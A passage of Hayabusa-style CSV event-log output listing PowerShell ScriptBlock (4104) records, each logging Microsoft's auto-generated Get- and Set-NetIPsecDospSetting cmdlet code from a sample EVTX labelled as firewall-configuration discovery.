$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 
'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml 
}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 
'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { 
[object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else 
{ $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundP",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"arameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; 
Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name 
= 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 
